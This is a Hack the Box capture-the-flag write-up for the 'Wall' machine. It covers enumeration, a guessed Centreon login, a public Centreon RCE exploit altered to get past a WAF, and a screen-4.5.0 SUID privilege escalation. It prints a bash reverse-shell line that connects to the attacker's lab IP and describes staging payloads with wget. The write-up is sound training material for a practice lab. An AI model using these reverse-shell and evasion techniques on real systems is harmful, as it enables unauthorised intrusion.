Hack the Box - Wall
Posted on December 7, 2019 • 5 minutes • 892 words
Welcome to my write-up for the Hack the Box machine, Wall. This box is listed as a medium box, let’s jump in!
As normal we start our enumeration process with
nmap -sC -sV -oA initial_scan 10.10.10.157
our results are pretty standard:
Nmap scan report for 10.10.10.157 Host is up (0.051s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 2e:93:41:04:23:ed:30:50:8d:0d:58:23:de:7f:2c:15 (RSA) | 256 4f:d5:d3:29:40:52:9e:62:58:36:11:06:72:85:1b:df (ECDSA) |_ 256 21:64:d0:c0:ff:1a:b4:29:0b:49:e1:11:81:b6:73:66 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.89 seconds
Let’s head over to see what’s being hosted.
We see a standard
apache2 install. So we’re going to want to enumerate this site a bit. We’ll add it to our hostfile as wall.htb and send it into
gobuster dir -u http://wall.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40
We only get back two standard results
Since I didn’t specify the
-x parameter on the initial scan, we need to run it again for file extensions. We see there are a few with the .php extension.
There are some interesting files and folders after enumeration. There doesn’t seem to be much we can do with the two new
php files. When we open
Burpsuit and start to poke the site with
POST requests, we see that if we send a
POST request to
/monitoring/ we are redirected to
We go to the address and are greated with a login form. We see the version running is 19.04. A quick
searchsploit on Centreon shows us that there is an RCE for this particular version.
We can copy this exploit to our current working directory with the
-m command of
searchsploit centreon -m 47069.
When we run the exploit we see our options:
In this case we’ll need to obtain user credentials to run the exploit. Now you can brute force this login with a few options,
wfuzz or just write your own. In my case guessing the password without doing any of those worked out, turns out password1 isn’t exactly hard to guess. Now that we have some credentials, we can use this exploit.
So we give our exploit our credentials and our IP and port. Start a new NC listener and fire it off… Nothing. Hmmm, so We will modify the exploit to show us what might be going on. We modify the last bit of lines to show as this:
Now that we will get back some data on what might be going on, we run it again and see what’s not working. We get back some XML data but it seems that it’s working. There could be a WAF in place blocking the standard malicious payloads. So we’ll again modify our script to simply take the payload we give it.
To do this we will change the amount of arguments our script takes. We will remove the line 30 & 31 for
port. We will then create an argument called
payload. We also need to modify the expected length on line 22. We should have something like this:
We then need to modify our
payload_info. Line 69 is where the payload the default exploit would use. However, we can simply replace this payload with the variable
payload. This way we can modify our payload on the go to evade whatever might be blocking the standard payload.
Our first goal will be to test it. We will execute our newly modified script to test that it works. We will start up a
SimpleHTTPServer and host a file. We will then issue
wget and see if the file is retrieved. In this case I made a quick file called shell.sh which has the standard bash remote connection:
bash -i >& /dev/tcp/10.10.15.154/4444 0>&1
We fire off our new exploit and we see it connect back to us and download the file.
Below we see that the exploit has indeed worked.
Next we have to move our file to the
/tmp directory just to be sure it can run. Then change the permissions of our script so it can execute.
We then fire up our listener and tell the script to execute. The first few times I tried this, I was unable to get a shell on random ports. So we just use the good ol’ port 53 trick.
We get a shell back as
www-data! Now that we are on the machine, we can start enumerating. We download
linenum and see what it comes back with. One item that is noticeable is
screen-4.5.0 in our SUID section.
searchsploit for screen comes back with two possible Local Privilege Escalations.
We will download the exploit, host it on our server and get it from the target machine.
The exploit will error, however if we check the directory, we see our shell file
rootshell. After that we run it and we have root shell:
We then grab the user flag. The box is done!
Hopefully something was learned. If you found this write-up helpful, consider sending some respect my way: Lovecore’s HTB Profile .